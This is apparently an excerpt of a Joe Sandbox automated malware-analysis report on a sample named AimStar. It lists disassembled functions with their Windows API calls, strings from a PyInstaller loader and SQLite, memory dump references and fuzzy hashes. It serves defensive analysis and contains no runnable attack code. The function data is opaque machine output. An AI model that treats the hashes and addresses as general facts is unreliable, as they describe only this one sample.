Instruction Fuzzy Hash: 8312ACA2A4BA46A5EB54DF25A4503BA6FA1FF84BC4F144031DF4E07794DF3CE4A18328

Function 00007FF710F669D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F66749
Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F667C7
Part of subcall function 00007FF710F66708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F66818

CreateFileW.KERNEL32 ref: 00007FF710F66ADA
CreateFileW.KERNEL32 ref: 00007FF710F66B2A
GetLastError.KERNEL32 ref: 00007FF710F66B5A
GetFileType.KERNEL32 ref: 00007FF710F66B6F
GetLastError.KERNEL32 ref: 00007FF710F66B79
CloseHandle.KERNEL32 ref: 00007FF710F66BAC
CloseHandle.KERNEL32 ref: 00007FF710F66D0F
CreateFileW.KERNEL32 ref: 00007FF710F66D44
GetLastError.KERNEL32 ref: 00007FF710F66D53

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 3d6b423a49bdf77829fa1d38af55f55ce240d54d2c4597cbe03b68c8a6d3d3b4
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 37C1E336B28E4185EB10DFA5C4922AC7779F749BA8F414225DE2E973D4CF38E059C310

Function 00007FF8A8719060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A8719B20
GetProcAddress.KERNEL32 ref: 00007FF8A8719B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A8719BD4
VirtualProtect.KERNEL32 ref: 00007FF8A8719BF2

Strings

)tP, xrefs: 00007FF8A871908B

Memory Dump Source

Source File: 00000002.00000002.2418799729.00007FF8A8719000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FF8A8210000, based on PE: true

Associated: 00000002.00000002.2417366174.00007FF8A8210000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8211000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8222000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8232000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8238000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8282000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8297000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A82A7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A82AE000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A82BC000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A849E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8589000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A858B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A85FF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A86CB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8700000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2417417497.00007FF8A8713000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2418850491.00007FF8A871A000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8210000_AimStar.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: 160d00a12d4f81ca8824a5a2dc4f9fe9ace5ede0258cbdef67a068793e36efb1
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: AE62232262919296E719CF38D4003BD76A0F7587C5F485532EA9EC3BD4EB3CEA46CB14

Function 00007FF8A87D4CF0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87D4F7D
00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87D502E

Strings

database schema is locked: %s, xrefs: 00007FF8A87D4ED6
statement too long, xrefs: 00007FF8A87D4F33
out of memory, xrefs: 00007FF8A87D4DDF

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 2830847230-1046679716
Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction ID: ce0ae0ccfa48a0d0ddeb8a5ce92572b2ae412c940738b2a1623ff9a7b90b6916
Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction Fuzzy Hash: C9F19122A4A692A7FB24DF21D4443BA6BA0FB85BC8F085135DA4D07795DF7CE481CF24

Function 00007FF8A8200330 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A8200E45
GetProcAddress.KERNEL32 ref: 00007FF8A8200E63
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A8200EE3
VirtualProtect.KERNEL32 ref: 00007FF8A8200F01

Memory Dump Source

Source File: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true

Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
Instruction ID: 31f2e8db8c8f3157ff2456a2215a88d3704b272ecb3133d9d6284fc14e2c12c8
Opcode Fuzzy Hash: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
Instruction Fuzzy Hash: 9C621222A2919696F7198A38D4002BD77A0FB487C5F045532EA9FC37C8EB7CEE45CB14

Function 00007FF8A87722E0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A8772498

Strings

:memory:, xrefs: 00007FF8A8772346

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: :memory:
API String ID: 2830847230-2920599690
Opcode ID: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
Instruction ID: 3527b34b338cb5557710814021a4b79a9297eb001a74b2159834accaf97e66a6
Opcode Fuzzy Hash: 1f6d5d266e673db7d7665723c418e299b62722c6e59ad763f08cdc77f1bc056a
Instruction Fuzzy Hash: 9E42AE22A5F786A6EB649B25955433D27A0FF95BC8F044135CE5E03BA0DF3CE894C328

Function 00007FF710F492F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF710F49323
FindClose.KERNEL32 ref: 00007FF710F49332

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: eb04b7a23a504dda5c4cc24377168714489a7164a0105c3d30689595ea8f8b38
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 83F0A432A1CA4586F7A09F60B45AB7AA394AB89338F840335DA6D427D4DF3CF04CCA00

Function 00007FF8A8761240 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8A8761265

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction ID: 146718264c1ccd80f5b75327fbea6ae1340441dbf622cd3d65cf7533aa1de325
Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction Fuzzy Hash: 32A1EB20B4BB4BA9FE59CB85A85C27822A4FF84BC0F544575C95E477A0DF7CE4948338

Function 00007FF710F41950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF710F47F80: _fread_nolock.LIBCMT ref: 00007FF710F4802A

_fread_nolock.LIBCMT ref: 00007FF710F41A1B

Part of subcall function 00007FF710F42910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E

Strings

Failed to read cookie!, xrefs: 00007FF710F41A2B
fread, xrefs: 00007FF710F41A32, 00007FF710F41B5C
Could not read full TOC!, xrefs: 00007FF710F41B55
malloc, xrefs: 00007FF710F41B22
Failed to seek to cookie position!, xrefs: 00007FF710F419EE
Could not allocate buffer for TOC!, xrefs: 00007FF710F41B1B
MEI, xrefs: 00007FF710F41991
calloc, xrefs: 00007FF710F41A68
fseek, xrefs: 00007FF710F419F5
Could not allocate memory for archive structure!, xrefs: 00007FF710F41A61
Error on file., xrefs: 00007FF710F41B8D

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction ID: 41efa7b3495124fff8043f3b7efdc5bffd634e46589c353aa36484e706f4381c
Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction Fuzzy Hash: 5E816F75B0CE8685E760AB24D442AF9B3A8FB48764F844431EE4D87785DE3CF589C760

Function 00007FF710F41470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF710F41518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF710F4149F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF710F414DE
fread, xrefs: 00007FF710F415E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF710F415DF
malloc, xrefs: 00007FF710F4151F
fseek, xrefs: 00007FF710F414E5

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
Instruction ID: 123a62a414823c4e96fb700e46b34fcb8be80b4484f9d6206dcf61333e7ba831
Opcode Fuzzy Hash: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
Instruction Fuzzy Hash: F3417D35B0CA4685EA10EB21A4029F9E3A8BF847A4FC44432EE1D47B95DF3CF54AC724

Function 00007FF8A87D4450 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8BFAC3010.VCRUNTIME140 ref: 00007FF8A87D45D9

Strings

sqlite_temp_master, xrefs: 00007FF8A87D4495
table, xrefs: 00007FF8A87D447A
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FF8A87D44F4
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FF8A87D47CF
ase, xrefs: 00007FF8A87D46DD
sqlite_master, xrefs: 00007FF8A87D449C

Memory Dump Source

Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true

Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd

Similarity

API ID: 00007C3010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 2830847230-879093740
Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction ID: 7bc3319e59d536fd5151955102d8b79a67f7ebd6ffbaa7dedee5bff19682e759
Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction Fuzzy Hash: 86E1BC22F4ABA2AAFB14CB24C5402B927A5FB45BD8F054235CE0D17791DF3CE452CB64

Function 00007FF710F41210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF710F41276
1.3.1, xrefs: 00007FF710F41249
malloc, xrefs: 00007FF710F412C1, 00007FF710F412F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF710F4141E
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF710F412BA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF710F412EF

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
Instruction ID: c086fc86ed1e5a7eba84767f62f73d64fb4f61f4d74099aff627033b576fcd02
Opcode Fuzzy Hash: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
Instruction Fuzzy Hash: A451CF32B0CE4681EA60BB15A4027BAA299BF857A4FC44131ED4D87B95EF3CF549C320

Function 00007FF710F436B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436E1
GetLastError.KERNEL32(?,00007FF710F43804), ref: 00007FF710F436EB

Part of subcall function 00007FF710F42C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
Part of subcall function 00007FF710F42C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
Part of subcall function 00007FF710F42C50: MessageBoxW.USER32 ref: 00007FF710F42D99

Strings

Failed to obtain executable path., xrefs: 00007FF710F436F3
GetModuleFileNameW, xrefs: 00007FF710F436FA
Failed to resolve full path to executable %ls., xrefs: 00007FF710F43739
\\?\, xrefs: 00007FF710F4375A
Failed to convert executable path to UTF-8., xrefs: 00007FF710F43790

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: fd07ceef45b65797b23486e0affbb32188036ea8bc2e9e3f21e6dd08f14ffbac
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: A12121A1B1CD4251FA60BB20E8567BAA258BF48764FC08132DA9DC27D5EE2CF50DC760

Function 00007FF710F5BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF710F5BEF9

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: e513b7bace5172dc647aefc25a027b363195179d1958c5dc7006568bbb1289f0
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: A7C1B722A0CE8A52E751AB1594472BDB7B8EB81BA0FD54131EA4D03791CF7CF65DCB20

Function 00007FF710F46350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF710F46446
Failed to load Python DLL '%ls'., xrefs: 00007FF710F46497
ucrtbase.dll, xrefs: 00007FF710F463CD
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF710F463B7
LoadLibrary, xrefs: 00007FF710F4649E
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF710F463F7

Memory Dump Source

Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true

Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction ID: 6cdda9dbe1ba3b20033d58d39b451a3c8e5bbe71f606a2f617c8e0659e527b87
Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
Instruction Fuzzy Hash: 4C415E35A0CE8691EA11FB20E4566E9A319FB48364FC00132EE5D83795EF3CF509C3A0

Function 00007FF8A875FFE0 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409
